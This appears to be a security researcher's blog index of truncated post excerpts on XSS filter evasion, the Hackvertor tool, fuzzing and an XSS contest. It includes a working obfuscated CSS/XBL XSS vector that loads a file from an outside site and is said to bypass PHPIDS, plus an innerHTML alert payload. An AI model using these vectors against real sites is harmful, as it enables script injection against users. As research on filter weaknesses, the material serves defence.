Future plans
I’ve done a big change in the Hackvertor code to pave the way for some new features. In future I plan to create a web service were we can create/share Hackvertor tags for free. This will enable custom versions of Hackvertor for a specific task, for example we could have a SQL injection version, [...]
I’ve put together a simple script which will use the Javascript parser to find a list of valid variables. This information is useful to know when testing XSS filters or malicious javascript detection. Using these unusual variables I’ve manged to slip Javascript passed some very clever filters including the PHPIDS and Noscript.
Check it out [...]
It’s amazing the stuff I’ve been finding recently, my browser has crashed more times than windoze. In this article I’ll introduce you to using the DOM for unexpected things and hacking it to your advantage. I’ve learned all this new stuff while hacking a vectors for the slackers XSS contest which is really fun.
Contents [...]
I’ve been having a lot of fun with the sla.ckers XSS replication contest and I found a cool way to replicate source code of the html document which I haven’t seen anywhere before. Check it out:-
alert(document.body.parentNode.innerHTML)
This alerts the entire HTML document in Firefox (hopefully IE7 as well). Which is pretty cool
Here is my [...]
I’ve created a separate tool for HTML/JS fuzzing, I decided to do this because Hackvertor does all the hard work of conversion and I can simply extend the functionality without writing much code. The tool is already very powerful and lets you traverse unicode characters and perform whatever conversions you require and in any position [...]
In my second part of Javascript for hackers I shall be showing how pointless it is to ban the use of document, location etc within form variables.
You can create some truly amazing strings which are unreadable to the human eye, many more vectors are available on the sla.ckers thread I created but I’ll show [...]
Developers place too much trust in everything, they assume that certain data cannot be faked and therefore these pieces of data can be used as a Trojan horse. Lets take the REMOTE IP of a user, it seems a trusted source because of the TCP/IP connection between the user and the server but take the [...]
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.
Credits update
The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one [...]
When someone uses htmlentities I’ve seen it time and time again that they expect that it filters variables from all XSS. This is wrong of course because the function requires a second parameter ENT_QUOTES which correctly replaces quote characters. Some developers aren’t even aware that quotes can lead to XSS injection.
This leads me to my [...]
Hacking the PHPIDS again I found some cool XSS:-
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
I’ve moved it onto two lines for correct display.
Who’d have thought that Firefox would allow all that within the url and CSS properties